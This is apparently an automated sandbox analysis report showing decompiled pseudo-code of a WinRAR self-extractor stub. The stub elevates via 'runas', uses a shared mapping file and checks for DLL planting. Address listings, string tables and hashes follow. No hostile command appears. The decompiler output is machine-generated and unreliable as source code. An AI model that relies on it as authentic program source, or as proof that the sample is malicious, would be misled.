												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t321 + 0x17);
													if( *(_t321 + 0x17) != 0) {
														_push(E00CADA42(_t285, 0x9a));
														E00CA3E41(_t321 - 0x5688, 0xa00, L"\"%s\"\n%s", _t321 - 0x2164);
														E00CA6E03(0xce00e0, _t277);
														E00CB9735(_t302, _t321 - 0x5688, E00CADA42(0xce00e0, 0x96), 0x30);
														 *0xce75cc =  *0xce75cc + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t321 - 0x1164, 0x800);
												_t285 = 0xceb602;
												E00CAE7AA(0xceb602, _t321 - 0x164, 0x80);
												_push(0xcea602);
												E00CA3E41(_t321 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t321 - 0x2164);
												_t323 = _t323 + 0x14;
												 *(_t321 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t321 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t321 - 0x38)) = _t321 - 0x1164;
												 *((intOrPtr*)(_t321 - 0x34)) = _t321 - 0x11ca0;
												 *(_t321 - 0x40) = _t302;
												 *((intOrPtr*)(_t321 - 0x3c)) = L"runas";
												 *(_t321 - 0x2c) = _t277;
												 *((intOrPtr*)(_t321 - 0x28)) = 0;
												 *((intOrPtr*)(_t321 - 0x30)) = 0xce75f8;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t321 + 8) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t321 + 0x10) =  *(_t321 + 0x14);
												} else {
													 *0xcf5d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E00CAFAB1(0xcf5d0a, _t231, 0x2000);
													}
													E00CBA24E(_t285, 0xcf9d0a, 7);
													E00CBA24E(_t285, 0xcfad0a, 2);
													E00CBA24E(_t285, 0xcfbd0a, 0x10);
													 *0xcfce0b = _t277;
													_t285 = 0xcfcd0a;
													E00CAE90C(_t277, 0xcfcd0a, _t321 - 0x164);
													 *(_t321 + 0x10) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E00CBEA80(_t238, 0xcf5d08, 0x7104);
													_t323 = _t323 + 0xc;
												}
												_t220 = ShellExecuteExW(_t321 - 0x48);
												E00CAE957(_t321 - 0x164, 0x80);
												E00CAE957(_t321 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t321 + 0x10);
													 *(_t321 + 0x17) = _t277;
													goto L64;
												} else {
													 *0xcddf20( *(_t321 - 0x10), 0x2710);
													_t71 = _t321 + 0xc;
													 *_t71 =  *(_t321 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t321 + 0x10);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t321 + 0xc) + 1;
														 *(_t321 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0xcfde2c =  *(_t321 - 0x10);
													L64:
													__eflags =  *(_t321 + 8);
													if( *(_t321 + 8) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t321 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t300;
											if(_t300 == 0) {
												goto L52;
											}
											E00CA3E41(_t321 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t323 = _t323 + 0x10;
											E00CA943C(_t321 - 0x3188);
											 *(_t321 - 4) =  *(_t321 - 4) & 0x00000000;
											_push(0x11);
											_push(_t321 - 0x1164);
											_t246 = E00CA9528(_t321 - 0x3188);
											 *((char*)(_t321 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t321 + 0x17) = _t277;
												}
											}
											_t39 = _t321 - 4;
											 *_t39 =  *(_t321 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00CA946E(_t321 - 0x3188); // executed
											_t285 =  *0xce9601;
											goto L50;
										}
										_t248 = GetLastError();
										_t300 =  *((intOrPtr*)(_t321 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t321 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t321 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0xce75d7 = 1;
									L75:
									__eflags =  *0xce75cc;
									if( *0xce75cc <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0xce75d0 = _t277;
									SetDlgItemTextW(_t302, _t277, E00CADA42(_t285, 0x90));
									_t290 =  *0xce00e0; // 0x0
									__eflags = _t290 - 9;
									if(_t290 != 9) {
										__eflags = _t290 - 3;
										_t189 = ((0 | _t290 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t321 + 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E00CADA42(_t290, 0x96);
									E00CB9735(_t302, E00CADA42(_t290, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0xce75d1;
							if( *0xce75d1 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0xcffe3c;
						if( *0xcffe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0xcffe3d;
							_t254 = _t149 & 0xffffff00 |  *0xcffe3d == 0x00000000;
							__eflags = _t254;
							 *0xcffe3d = _t254;
							_t255 = E00CADA42((0 | _t254 != 0x00000000) + 0xe6, (0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t302, 1, _t255);
							while(1) {
								__eflags =  *0xcffe3d;
								if( *0xcffe3d == 0) {
									goto L125;
								}
								__eflags =  *0xce75d7;
								if( *0xce75d7 != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t321 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 = IsDialogMessageW(_t302, _t321 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t321 - 0x64);
										DispatchMessageW(_t321 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0xce75dc;
						 *0xce75d7 = 1;
						if( *0xce75dc == 0) {
							goto L12;
						}
						__eflags =  *0xce75cc;
						if( *0xce75cc != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E00CA1217(_t302, E00CADA42(_t285, 0x64), _t321 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t302, 0x66, _t321 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}























































                0x00cba5d1
                0x00cba5d1
                0x00cba5d6
                0x00cba5e0
                0x00cba5e6
                0x00cba5ea
                0x00cba5ee
                0x00cba607
                0x00cba611
                0x00cba611
                0x00cba617
                0x00cbacb3
                0x00cbacb8
                0x00cbacbf
                0x00cbacc0
                0x00cbacc6
                0x00cbaccc
                0x00cbacce
                0x00cbacd8
                0x00cbacd8
                0x00cbacde
                0x00cbace3
                0x00cbace5
                0x00cbacf2
                0x00cbacf2
                0x00cbad01
                0x00cbad10
                0x00cbad13
                0x00cbad25
                0x00cbad2d
                0x00cbad2f
                0x00cbad37
                0x00cbad39
                0x00cbad3c
                0x00cbad41
                0x00cbad43
                0x00cbad43
                0x00cbad4b
                0x00cbad52
                0x00cbad57
                0x00cbad5c
                0x00cbad61
                0x00cbad66
                0x00cbad67
                0x00cbad6e
                0x00cbad73
                0x00cbad75
                0x00cbad77
                0x00cbad77
                0x00cbad7d
                0x00cbad84
                0x00cbad86
                0x00cbad88
                0x00cbad8e
                0x00cbad8f
                0x00cbad8f
                0x00cbad94
                0x00cbad9b
                0x00cbadab
                0x00cbadbe
                0x00cbadbe
                0x00cbadc4
                0x00cbadcb
                0x00cbae7c
                0x00cbae7c
                0x00cbae83
                0x00cbaf2c
                0x00cbaf2c
                0x00cbaf33
                0x00cbaf38
                0x00cbaf38
                0x00cbaf3e
                0x00cbaf45
                0x00cbaf4c
                0x00cbaf56
                0x00cbaf56
                0x00cbaf5b
                0x00cbaf60
                0x00cbaf62
                0x00cbaf64
                0x00cbaf6b
                0x00cbaf6d
                0x00cbaf6f
                0x00cbaf70
                0x00cbaf75
                0x00cbaf76
                0x00cbaf78
                0x00cbaf82
                0x00cbaf7a
                0x00cbaf7a
                0x00cbaf7a
                0x00cbaf78
                0x00cbaf6b
                0x00cbaf88
                0x00cbaf8f
                0x00cbaf9e
                0x00cbaf9e
                0x00000000
                0x00cbaf8f
                0x00cbae89
                0x00cbae90
                0x00000000
                0x00000000
                0x00cbae96
                0x00cbae9d
                0x00000000
                0x00000000
                0x00cbaea3
                0x00cbaea5
                0x00cbaeaa
                0x00cbaeb1
                0x00cbaeb1
                0x00cbaeb7
                0x00cbaec2
                0x00cbaec2
                0x00cbaec8
                0x00cbaed3
                0x00cbaee4
                0x00cbaefc
                0x00000000
                0x00cbaefc
                0x00cbaeca
                0x00cbaed1
                0x00000000
                0x00000000
                0x00000000
                0x00cbaed1
                0x00cbaeb9
                0x00cbaec0
                0x00000000
                0x00000000
                0x00000000
                0x00cbaf01
                0x00cbaf01
                0x00cbaf02
                0x00cbaf02
                0x00cbaf0a
                0x00cbaf24
                0x00cbaf29
                0x00000000
                0x00cbadd1
                0x00cbadd1
                0x00cbadd3
                0x00cbadd9
                0x00cbadda
                0x00cbaddf
                0x00cbade4
                0x00cbade6
                0x00cbade8
                0x00cbadef
                0x00cbadf1
                0x00cbae05
                0x00cbae10
                0x00cbae15
                0x00cbae15
                0x00cbadef
                0x00cbae16
                0x00cbae1c
                0x00cbae6f
                0x00cbae6f
                0x00cbae70
                0x00cbae76
                0x00cbae77
                0x00000000
                0x00cbae1e
                0x00cbae1f
                0x00cbae25
                0x00cbae2b
                0x00000000
                0x00000000
                0x00cbae2d
                0x00cbae34
                0x00000000
                0x00000000
                0x00cbae36
                0x00cbae38
                0x00cbae3e
                0x00cbae3f
                0x00cbae44
                0x00cbae4b
                0x00000000
                0x00000000
                0x00cbae61
                0x00cbae67
                0x00cbae69
                0x00cba75d
                0x00cba75d
                0x00cba763
                0x00cba763
                0x00cba687
                0x00cba688
                0x00cbafa4
                0x00cbafa4
                0x00cbafa6
                0x00cbafac
                0x00cbafb6
                0x00cbafb6
                0x00000000
                0x00cbae69
                0x00cbae1c
                0x00cbadcb
                0x00cba61d
                0x00cba620
                0x00cba634
                0x00cba634
                0x00000000
                0x00cba634
                0x00cba625
                0x00cba625
                0x00cba628
                0x00cba693
                0x00cba69a
                0x00cba732
                0x00cba732
                0x00cba742
                0x00cba748
                0x00cba74f
                0x00cba769
                0x00cba770
                0x00cba784
                0x00cba78a
                0x00cba791
                0x00cba793
                0x00cba7a5
                0x00cba7b4
                0x00cba7b6
                0x00cba7b6
                0x00cba7bc
                0x00cba7c2
                0x00cba7c9
                0x00cba7e6
                0x00cba7f3
                0x00cba816
                0x00cba81b
                0x00cba81e
                0x00cba7cb
                0x00cba7d0
                0x00cba7d0
                0x00cba827
                0x00cba82c
                0x00cba833
                0x00cba83c
                0x00cba83c
                0x00cba841
                0x00cba84b
                0x00cba84c
                0x00cba84f
                0x00cba85c
                0x00cba85d
                0x00cba85f
                0x00cba872
                0x00cba87e
                0x00cba880
                0x00cba883
                0x00cba885
                0x00cba898
                0x00cba898
                0x00cba89b
                0x00cba89b
                0x00cba8a1
                0x00cba8a3
                0x00cba912
                0x00cba912
                0x00cba916
                0x00cbab5a
                0x00cbab60
                0x00cbab6a
                0x00cbab82
                0x00cbab88
                0x00cbab95
                0x00cbaba0
                0x00cbaba2
                0x00cbaba4
                0x00cbabaf
                0x00cbabaf
                0x00cbabb8
                0x00cbabb8
                0x00cbabbe
                0x00cbabc0
                0x00cbabc6
                0x00cbabc7
                0x00cbabcc
                0x00cbabce
                0x00cbabd4
                0x00cbabd5
                0x00cbabda
                0x00cbabdf
                0x00cbabe0
                0x00cbabe6
                0x00cbabeb
                0x00cbabed
                0x00cbabf3
                0x00cbabfa
                0x00cbabfb
                0x00cbac00
                0x00cbac07
                0x00cbac09
                0x00cbac10
                0x00cbac12
                0x00cbac19
                0x00cbac1b
                0x00cbac1d
                0x00cbac23
                0x00cbac24
                0x00cbac24
                0x00cbac19
                0x00cbac10
                0x00cbac2c
                0x00cbac31
                0x00cbac31
                0x00cbac38
                0x00000000
                0x00cbac38
                0x00cba91c
                0x00cba923
                0x00cba923
                0x00cba926
                0x00cba926
                0x00cba928
                0x00cba92c
                0x00cba92e
                0x00cbaaf0
                0x00cbaaf0
                0x00cbaaf4
                0x00cbab04
                0x00cbab1d
                0x00cbab2b
                0x00cbab45
                0x00cbab4a
                0x00cbab4a
                0x00cba685
                0x00cba685
                0x00000000
                0x00cba685
                0x00cba942
                0x00cba953
                0x00cba959
                0x00cba95e
                0x00cba97b
                0x00cba980
                0x00cba983
                0x00cba990
                0x00cba997
                0x00cba9a0
                0x00cba9b8
                0x00cba9bb
                0x00cba9c2
                0x00cba9c5
                0x00cba9c8
                0x00cba9d5
                0x00cba9d7
                0x00cba9da
                0x00cba9dc
                0x00cbaa67
                0x00cba9e2
                0x00cba9e2
                0x00cba9e9
                0x00cba9ef
                0x00cba9f1
                0x00cba9fe
                0x00cba9fe
                0x00cbaa0a
                0x00cbaa16
                0x00cbaa22
                0x00cbaa2d
                0x00cbaa34
                0x00cbaa39
                0x00cbaa57
                0x00cbaa5a
                0x00cbaa5f
                0x00cbaa5f
                0x00cbaa6e
                0x00cbaa82
                0x00cbaa93
                0x00cbaa98
                0x00cbaa9a
                0x00cbaad4
                0x00cbaad7
                0x00000000
                0x00cbaa9c
                0x00cbaaa4
                0x00cbaaaa
                0x00cbaaaa
                0x00cbaaaa
                0x00cbaaae
                0x00cbaab1
                0x00cbaab1
                0x00cbaab4
                0x00000000
                0x00000000
                0x00cbaab8
                0x00cbaac1
                0x00cbaac2
                0x00cbaac5
                0x00cbaac8
                0x00000000
                0x00000000
                0x00000000
                0x00cbaac8
                0x00cbaacd
                0x00cbaada
                0x00cbaada
                0x00cbaade
                0x00cbaae1
                0x00cbaaea
                0x00cbaaea
                0x00000000
                0x00cbaade
                0x00cbaa9a
                0x00cba8a5
                0x00cba8a7
                0x00000000
                0x00000000
                0x00cba8c1
                0x00cba8c6
                0x00cba8cf
                0x00cba8d4
                0x00cba8de
                0x00cba8e0
                0x00cba8e7
                0x00cba8ec
                0x00cba8ef
                0x00cba8f1
                0x00cba8f3
                0x00cba8f5
                0x00cba8f8
                0x00cba8fa
                0x00cba8fa
                0x00cba8f8
                0x00cba8fd
                0x00cba8fd
                0x00cba8fd
                0x00cba907
                0x00cba90c
                0x00000000
                0x00cba90c
                0x00cba887
                0x00cba889
                0x00cba88c
                0x00cba88f
                0x00000000
                0x00000000
                0x00cba891
                0x00cba893
                0x00000000
                0x00cba861
                0x00cba861
                0x00cba863
                0x00cba866
                0x00cba86d
                0x00cba86f
                0x00000000
                0x00cba86f
                0x00cba868
                0x00cba86b
                0x00000000
                0x00000000
                0x00000000
                0x00cba86b
                0x00cba772
                0x00cba774
                0x00cba775
                0x00cba777
                0x00cbac3d
                0x00cbac3d
                0x00cbac44
                0x00000000
                0x00000000
                0x00cbac4a
                0x00cbac4c
                0x00000000
                0x00000000
                0x00cbac57
                0x00cbac65
                0x00cbac6b
                0x00cbac71
                0x00cbac74
                0x00cbac7f
                0x00cbac89
                0x00cbac89
                0x00cbac8e
                0x00cbac91
                0x00cbac76
                0x00cbac76
                0x00cbac76
                0x00cbac9a
                0x00cbaca8
                0x00000000
                0x00cbaca8
                0x00cba770
                0x00cba753
                0x00cba754
                0x00cba75b
                0x00000000
                0x00000000
                0x00000000
                0x00cba75b
                0x00cba6a0
                0x00cba6a7
                0x00000000
                0x00cba6ad
                0x00cba6ad
                0x00cba6b4
                0x00cba6b9
                0x00cba6bb
                0x00cba6ca
                0x00cba6d2
                0x00cba6d5
                0x00cba724
                0x00cba724
                0x00cba72b
                0x00cba72d
                0x00cba72d
                0x00cba6dd
                0x00cba6e4
                0x00000000
                0x00000000
                0x00cba6f3
                0x00cba6f9
                0x00cba6fb
                0x00000000
                0x00cba701
                0x00cba706
                0x00cba70c
                0x00cba70e
                0x00cba714
                0x00cba71e
                0x00cba71e
                0x00000000
                0x00cba70e
                0x00cba6fb
                0x00000000
                0x00cba724
                0x00cba6a7
                0x00cba62a
                0x00cba62a
                0x00cba62d
                0x00cba668
                0x00cba669
                0x00cba670
                0x00cba676
                0x00000000
                0x00000000
                0x00cba678
                0x00cba67f
                0x00000000
                0x00000000
                0x00000000
                0x00cba67f
                0x00cba62f
                0x00cba632
                0x00cba64b
                0x00cba650
                0x00cba652
                0x00cba65e
                0x00cba65e
                0x00000000
                0x00cba652
                0x00000000
                0x00cba632
                0x00cba609
                0x00cba60b
                0x00000000

                APIs
                • __EH_prolog.LIBCMT ref: 00CBA5D6
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prologItemTextWindow
                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                • API String ID: 810644672-1650746426
                • Opcode ID: cd9c575c311382b74b913db879134642be538da37b14a44b6cb8bd45a32ca973
                • Instruction ID: 52a8e0b5ead2dfcf3b071e1a9516303de52f1132e646172798a74c1a5d02e380
                • Opcode Fuzzy Hash: cd9c575c311382b74b913db879134642be538da37b14a44b6cb8bd45a32ca973
                • Instruction Fuzzy Hash: 7F4215B1945385BFEB219BA0DC8AFFE3B6CEB01704F040155F692AA0D1DBB44E45DB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAFD49, Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314libraryfileloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E00CAFD49(void* __edx, char _a3, long _a4, CHAR* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24, CHAR* _a28, CHAR* _a32, CHAR* _a36, CHAR* _a40, CHAR* _a44, CHAR* _a48, CHAR* _a52, CHAR* _a56, CHAR* _a60, CHAR* _a64, CHAR* _a68, CHAR* _a72, CHAR* _a76, CHAR* _a80, CHAR* _a84, CHAR* _a88, CHAR* _a92, CHAR* _a96, CHAR* _a100, CHAR* _a104, CHAR* _a108, CHAR* _a112, CHAR* _a116, CHAR* _a120, CHAR* _a124, CHAR* _a128, CHAR* _a132, CHAR* _a136, CHAR* _a140, CHAR* _a144, CHAR* _a148, CHAR* _a152, CHAR* _a156, CHAR* _a160, CHAR* _a164, CHAR* _a168, CHAR* _a172, CHAR* _a176, CHAR* _a180, CHAR* _a184, CHAR* _a188, CHAR* _a192, CHAR* _a196, CHAR* _a200, CHAR* _a204, CHAR* _a208, CHAR* _a212, CHAR* _a216, CHAR* _a220, CHAR* _a224, CHAR* _a228, CHAR* _a232, CHAR* _a236, CHAR* _a240, CHAR* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
				char _v1;
				long _v4;
				char* _t118;
				void* _t126;
				int _t130;
				long _t141;
				int _t167;
				_Unknown_base(*)()* _t176;
				_Unknown_base(*)()* _t177;
				signed char _t184;
				struct _SECURITY_ATTRIBUTES* _t195;
				long _t197;
				void* _t198;
				struct HINSTANCE__* _t201;
				signed int _t203;
				signed int _t205;
				void* _t206;
				signed int _t207;
				int _t208;
				void* _t210;

				E00CBD940();
				_push(_t207);
				_a3 = 0;
				_t201 = GetModuleHandleW(L"kernel32");
				if(_t201 == 0) {
					L5:
					_t118 =  *0xcdd080; // 0xcd2884
					_t208 = _t207 | 0xffffffff;
					_t202 = 0x800;
					_a8 = L"version.dll";
					_a12 = L"DXGIDebug.dll";
					_a16 = L"sfc_os.dll";
					_a20 = L"SSPICLI.DLL";
					_a24 = L"rsaenh.dll";
					_a28 = L"UXTheme.dll";
					_a32 = L"dwmapi.dll";
					_a36 = L"cryptbase.dll";
					_a40 = L"lpk.dll";
					_a44 = L"usp10.dll";
					_a48 = L"clbcatq.dll";
					_a52 = L"comres.dll";
					_a56 = L"ws2_32.dll";
					_a60 = L"ws2help.dll";
					_a64 = L"psapi.dll";
					_a68 = L"ieframe.dll";
					_a72 = L"ntshrui.dll";
					_a76 = L"atl.dll";
					_a80 = L"setupapi.dll";
					_a84 = L"apphelp.dll";
					_a88 = L"userenv.dll";
					_a92 = L"netapi32.dll";
					_a96 = L"shdocvw.dll";
					_a100 = L"crypt32.dll";
					_a104 = L"msasn1.dll";
					_a108 = L"cryptui.dll";
					_a112 = L"wintrust.dll";
					_a116 = L"shell32.dll";
					_a120 = L"secur32.dll";
					_a124 = L"cabinet.dll";
					_a128 = L"oleaccrc.dll";
					_a132 = L"ntmarta.dll";
					_a136 = L"profapi.dll";
					_a140 = L"WindowsCodecs.dll";
					_a144 = L"srvcli.dll";
					_a148 = L"cscapi.dll";
					_a152 = L"slc.dll";
					_a156 = L"imageres.dll";
					_a160 = L"dnsapi.DLL";
					_a164 = L"iphlpapi.DLL";
					_a168 = L"WINNSI.DLL";
					_a172 = L"netutils.dll";
					_a176 = L"mpr.dll";
					_a180 = L"devrtl.dll";
					_a184 = L"propsys.dll";
					_a188 = L"mlang.dll";
					_a192 = L"samcli.dll";
					_a196 = L"samlib.dll";
					_a200 = L"wkscli.dll";
					_a204 = L"dfscli.dll";
					_a208 = L"browcli.dll";
					_a212 = L"rasadhlp.dll";
					_a216 = L"dhcpcsvc6.dll";
					_a220 = L"dhcpcsvc.dll";
					_a224 = L"XmlLite.dll";
					_a228 = L"linkinfo.dll";
					_a232 = L"cryptsp.dll";
					_a236 = L"RpcRtRemote.dll";
					_a240 = L"aclui.dll";
					_a244 = L"dsrole.dll";
					_a248 = L"peerdist.dll";
					if( *_t118 == 0x78) {
						L14:
						GetModuleFileNameW(0,  &_a772, _t202);
						E00CAFAB1( &_a9160, E00CAB943(_t223,  &_a772), _t202);
						_t195 = 0;
						_t203 = 0;
						do {
							if(E00CAA995() < 0x600) {
								_t126 = 0;
								__eflags = 0;
							} else {
								_t126 = E00CAFCFD( *((intOrPtr*)(_t210 + 0x18 + _t203 * 4))); // executed
							}
							if(_t126 == 0) {
								L20:
								_push(0x800);
								E00CAB9B9(_t227,  &_a772,  *((intOrPtr*)(_t210 + 0x1c + _t203 * 4)));
								_t130 = GetFileAttributesW( &_a760); // executed
								if(_t130 != _t208) {
									_t195 =  *((intOrPtr*)(_t210 + 0x18 + _t203 * 4));
									L24:
									if(_v1 != 0) {
										L30:
										_t234 = _t195;
										if(_t195 == 0) {
											return _t130;
										}
										E00CAB98D(_t234,  &_a768);
										if(E00CAA995() < 0x600) {
											_push( &_a9160);
											_push( &_a768);
											E00CA3E41( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t195);
											_t210 = _t210 + 0x18;
											_t130 = AllocConsole();
											__eflags = _t130;
											if(_t130 != 0) {
												__imp__AttachConsole(GetCurrentProcessId());
												_t141 = E00CC2B33( &_a4860);
												WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t141,  &_v4, 0);
												Sleep(0x2710);
												_t130 = FreeConsole();
											}
										} else {
											E00CAFCFD(L"dwmapi.dll");
											E00CAFCFD(L"uxtheme.dll");
											_push( &_a9152);
											_push( &_a760);
											E00CA3E41( &_a4852, 0x864, E00CADA42(_t185, 0xf1), _t195);
											_t210 = _t210 + 0x18;
											_t130 = E00CB9735(0,  &_a4848, E00CADA42(_t185, 0xf0), 0x30);
										}
										ExitProcess(0);
									}
									_t205 = 0;
									while(1) {
										_push(0x800);
										E00CAB9B9(0,  &_a768,  *((intOrPtr*)(_t210 + 0x3c + _t205 * 4)));
										_t130 = GetFileAttributesW( &_a756);
										if(_t130 != _t208) {
											break;
										}
										_t205 = _t205 + 1;
										if(_t205 < 0x35) {
											continue;
										}
										goto L30;
									}
									_t195 =  *((intOrPtr*)(_t210 + 0x38 + _t205 * 4));
									goto L30;
								}
							} else {
								_t130 = CompareStringW(0x400, 0x1001,  *(_t210 + 0x24 + _t203 * 4), _t208, L"DXGIDebug.dll", _t208); // executed
								_t227 = _t130 - 2;
								if(_t130 != 2) {
									goto L21;
								}
								goto L20;
							}
							L21:
							_t203 = _t203 + 1;
						} while (_t203 < 8);
						goto L24;
					}
					_t197 = E00CC6662(_t185, _t118);
					_pop(_t185);
					if(_t197 == 0) {
						goto L14;
					}
					GetModuleFileNameW(0,  &_a4868, 0x800);
					_t206 = CreateFileW( &_a4868, 0x80000000, 1, 0, 3, 0, 0);
					if(_t206 == _t208 || SetFilePointer(_t206, _t197, 0, 0) != _t197) {
						L13:
						CloseHandle(_t206);
						_t202 = 0x800;
						goto L14;
					} else {
						_t167 = ReadFile(_t206,  &_a13260, 0x7ffe,  &_a4, 0);
						_t222 = _t167;
						if(_t167 == 0) {
							goto L13;
						}
						_t185 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
						_push( &_a252);
						_push( &_a13260);
						while(1) {
							_t198 = E00CAF835(_t222);
							_t223 = _t198;
							if(_t198 == 0) {
								goto L13;
							}
							E00CAFCFD( &_a252);
							_push(0x104);
							_push( &_a248);
							_push(_t198);
						}
						goto L13;
					}
				}
				_t176 = GetProcAddress(_t201, "SetDllDirectoryW");
				_t184 = _a46032;
				if(_t176 != 0) {
					asm("sbb ecx, ecx");
					_t185 =  ~(_t184 & 0x000000ff) & 0x00cd22e4;
					 *_t176( ~(_t184 & 0x000000ff) & 0x00cd22e4);
				}
				_t177 = GetProcAddress(_t201, "SetDefaultDllDirectories");
				if(_t177 != 0) {
					_t185 = ((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000;
					 *_t177(((_t184 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					_v1 = 1;
				}
				goto L5;
			}























                0x00cafd4e
                0x00cafd54
                0x00cafd5c
                0x00cafd67
                0x00cafd6b
                0x00cafdbe
                0x00cafdbe
                0x00cafdc3
                0x00cafdcc
                0x00cafdd1
                0x00cafdd9
                0x00cafde4
                0x00cafdec
                0x00cafdf4
                0x00cafdfc
                0x00cafe04
                0x00cafe0c
                0x00cafe14
                0x00cafe1c
                0x00cafe24
                0x00cafe2c
                0x00cafe34
                0x00cafe3c
                0x00cafe44
                0x00cafe4c
                0x00cafe54
                0x00cafe5c
                0x00cafe64
                0x00cafe6c
                0x00cafe74
                0x00cafe7c
                0x00cafe84
                0x00cafe8c
                0x00cafe94
                0x00cafe9c
                0x00cafea4
                0x00cafeaf
                0x00cafeba
                0x00cafec5
                0x00cafed0
                0x00cafedb
                0x00cafee6
                0x00cafef1
                0x00cafefc
                0x00caff07
                0x00caff12
                0x00caff1d
                0x00caff28
                0x00caff33
                0x00caff3e
                0x00caff49
                0x00caff54
                0x00caff5f
                0x00caff6a
                0x00caff75
                0x00caff80
                0x00caff8b
                0x00caff96
                0x00caffa1
                0x00caffac
                0x00caffb7
                0x00caffc2
                0x00caffcd
                0x00caffd8
                0x00caffe3
                0x00caffee
                0x00cafff9
                0x00cb0004
                0x00cb000f
                0x00cb001a
                0x00cb0025
                0x00cb00f3
                0x00cb00fe
                0x00cb0117
                0x00cb0122
                0x00cb0124
                0x00cb0126
                0x00cb0130
                0x00cb013d
                0x00cb013d
                0x00cb0132
                0x00cb0136
                0x00cb0136
                0x00cb0141
                0x00cb0163
                0x00cb0163
                0x00cb0174
                0x00cb0181
                0x00cb0185
                0x00cb018f
                0x00cb0193
                0x00cb0198
                0x00cb01cc
                0x00cb01cc
                0x00cb01ce
                0x00cb02e5
                0x00cb02e5
                0x00cb01dc
                0x00cb01eb
                0x00cb025a
                0x00cb0262
                0x00cb0276
                0x00cb027b
                0x00cb027e
                0x00cb0284
                0x00cb0286
                0x00cb028f
                0x00cb02a4
                0x00cb02bc
                0x00cb02c7
                0x00cb02cd
                0x00cb02cd
                0x00cb01ed
                0x00cb01f2
                0x00cb01fc
                0x00cb0208
                0x00cb0210
                0x00cb022a
